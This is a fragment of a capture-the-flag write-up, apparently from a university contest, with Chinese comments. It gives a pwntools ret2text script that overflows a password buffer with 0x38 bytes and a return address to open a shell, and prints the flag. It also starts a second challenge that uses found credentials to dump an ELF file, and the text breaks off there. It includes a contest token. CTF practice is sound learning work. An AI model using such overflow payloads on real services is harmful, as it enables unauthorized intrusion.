PWNbabypwnret2textfrom pwn import * io = remote("prob07.contest.pku.edu.cn", 10007)# io = process("./pwn")context.log_level = "debug"io.sendlineafter(b"Please input your token: ", b"522:MEUCIQCosOLImE2i11gtdIBeP9r5hu3E3FWIZdqixPB_QpEjwAIgS009Snrl5oFLGCL_134AkS-89M8nG7kzl127hf29584=")io.sendafter(b"Enter your username:", b"root")# gdb.attach(io, "b* 0x4011E9")# pause()io.sendafter(b"Enter the password:", b"a" * 0x38 + p64(0x40117A))io.interactive()#flag{KooD1EijiemeePH8ieNei2XoL8iCh5de}Login没有附件,测试发现password存在栈溢出,并且会有回显数据发现登录账号和密码username: admin password: 1q2w3e4r尝试登录登录成功后发现回显数据有很明显的ELF文件头接收数据写入文件io.sendlineafter(b"Please input your token:", b"522:MEUCIQCosOLImE2i11gtdIBeP9r5hu3E3FWIZdqixPB_QpEjwAIgS009Snrl5oFLGCL_134AkS-89M8nG7kzl127hf29584=")io.sendlineafter(b"Username:", b"admin")io.sendlineafter(b"Password:", b"1q2w3e4r")io.recvuntil(b"Core dumped\n")hex_data
………………………………